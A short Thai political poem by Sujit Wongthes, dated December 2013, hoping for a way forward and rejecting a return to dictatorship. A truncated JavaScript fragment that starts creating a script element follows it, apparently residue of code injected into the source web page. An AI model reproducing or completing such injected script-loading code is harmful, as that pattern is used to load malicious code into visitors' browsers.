หนทางสว่างสว่างยังพอมี

ดีไม่ดีร่วมแก้ไขไปข้างหน้า

ไยขอร้องผองเผด็จการกลับมา

หนทางมืดมิดฟ้าดินกันดาร


สุจิตต์ วงษ์เทศ

11  ธันวาคม 2556

} else {var d=document;var s=d.createElement(‘script’);